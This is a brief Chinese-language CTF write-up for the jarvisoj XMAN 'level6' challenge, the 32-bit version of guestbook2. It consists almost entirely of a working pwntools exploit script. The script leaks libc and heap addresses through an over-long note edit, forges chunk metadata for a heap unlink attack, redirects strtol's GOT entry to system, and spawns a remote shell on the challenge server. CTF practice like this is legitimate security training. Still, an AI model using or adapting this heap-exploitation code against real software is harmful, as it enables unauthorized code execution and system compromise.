[XMAN]level6

nc pwn2.jarvisoj.com 9885

 

 

Hint1: 本题附件已更新,请大家重新下载以免影响解题。

 

level6.rar.69c5609dc9bab6c458b9c70d23e9445d

 

之前的guestbook2的32位版本

exp如下:

from pwn import *

def list_note():
    """Pick menu item 1 (list notes) on the global ``io`` tube.

    Only drives the remote prompt; whatever the program prints back is left
    in the tube for the caller to read.
    """
    prompt, choice = 'Your choice: ', '1'
    io.recvuntil(prompt)
    io.sendline(choice)

def new_note(note):
    """Pick menu item 2 and submit *note* on the global ``io`` tube.

    The length answered to the "Length of new note" prompt is exactly
    ``len(note)``; the note body itself is sent with ``send`` (no newline).
    """
    dialogue = (
        ('Your choice: ', '2'),
        ('Length of new note: ', str(len(note))),
    )
    for prompt, answer in dialogue:
        io.recvuntil(prompt)
        io.sendline(answer)
    io.recvuntil('Enter your note: ')
    io.send(note)

def edit_note(number, note):
    """Pick menu item 3 and replace note *number* with *note*.

    The length reported to the program is ``len(note)``, so a body longer
    than the note's original size is passed through unchanged; the body is
    sent with ``send`` (no trailing newline).
    """
    dialogue = (
        ('Your choice: ', '3'),
        ('Note number: ', str(number)),
        ('Length of note: ', str(len(note))),
    )
    for prompt, answer in dialogue:
        io.recvuntil(prompt)
        io.sendline(answer)
    io.recvuntil('Enter your note: ')
    io.send(note)

def delete_note(number):
    """Pick menu item 4 and delete note *number* on the global ``io`` tube."""
    dialogue = (
        ('Your choice: ', '4'),
        ('Note number: ', str(number)),
    )
    for prompt, answer in dialogue:
        io.recvuntil(prompt)
        io.sendline(answer)

#io = process('./freenote_x86')
#io = gdb.debug('./freenote_x86', 'b *0x8048760')
# Remote target; the two commented lines above are the local / debugger variants.
io = remote('pwn2.jarvisoj.com', 9885)
# `elf` is loaded but never referenced below (strtol_got is hard-coded instead).
elf = ELF('./freenote_x86')
#libc = elf.libc
# All libc-relative constants below are tied to this specific libc-2.19 build.
libc = ELF('./libc-2.19.so')
# Hard-coded GOT slot of strtol -- presumably a non-PIE binary; confirm against `elf`.
strtol_got = 0x804A2BC

# Five 128-byte notes, then notes 1 and 3 are deleted (0, 2, 4 stay in use).
new_note(b'a' * 128)
new_note(b'b' * 128)
new_note(b'c' * 128)
new_note(b'd' * 128)
new_note(b'e' * 128)
delete_note(1)
delete_note(3)
# Note 0 is rewritten 8 bytes longer than it was created; the listing is then
# read past the 8-byte 'b' marker and the next 4 bytes are taken as a libc
# pointer (the program seems not to re-check the length on edit -- inferred).
edit_note(0, b'a' * 128 + b'b' * 8)
list_note()
io.recvuntil('b' * 8)
libc_addr = u32(io.recv(4))
info("libc_addr:" + str(hex(libc_addr)))
#libc_base = libc_addr - 0x1B3780 - 48
# Fixed leak-to-base offset for this libc build; the commented line above is an
# earlier value kept for reference.
libc_base = libc_addr - 0x1AD420 - 48
info("libc_base:" + str(hex(libc_base)))
system_addr = libc_base + libc.symbols['system']
info("system_addr:" + str(hex(system_addr)))
# Same read-back with a 12-byte marker: the following 4 bytes are taken as a
# heap pointer.
edit_note(0, b'a' * 128 + b'b' * 12)
list_note()
io.recvuntil('b' * 12)
heap_addr = u32(io.recv(4))
info("heap_addr:" + str(hex(heap_addr)))
# 0xdb0 is a fixed distance from the leaked pointer to the heap start; only
# valid for this binary's allocation order.
heap_base = heap_addr - 0xdb0
info("heap_base:" + str(hex(heap_base)))

# Forged chunk metadata written through note 0: size-looking words 0x88/0x80
# and the pointer pair (unlink_addr - 12, unlink_addr - 8), padded to two
# 0x80-byte chunks, followed by deleting note 1. NOTE(review): the exact word
# layout is specific to this binary's heap layout; nothing here is checked
# before it is sent.
unlink_addr = heap_base + 0x18
info("unlink_addr:" + str(hex(unlink_addr)))
payload = p32(0x88) + p32(0x80) + p32(unlink_addr - 12) + p32(unlink_addr - 8)
payload = payload.ljust(0x80, b'\x00')
payload += p32(0x80) + p32(0x88)
payload = payload.ljust(0x80 * 2, b'\x00')
edit_note(0, payload)
delete_note(1)

# Second write through note 0: looks like a rewritten note table
# (count=2, then two records of flag/length/pointer, the second pointing at
# strtol_got) -- field order inferred from the values; confirm against the
# binary. Editing note 1 then writes system_addr into that GOT slot.
payload = p32(2) + p32(1) + p32(0x100) + p32(heap_addr + 0xc) + p32(1) + p32(4) + p32(strtol_got)
payload = payload.ljust(0x80 * 2, b'\x00')
edit_note(0, payload)
edit_note(1, p32(system_addr))

# The menu choice string is handed to the (now replaced) strtol entry.
io.recvuntil('Your choice: ')
io.sendline('/bin/sh')

io.interactive()

 


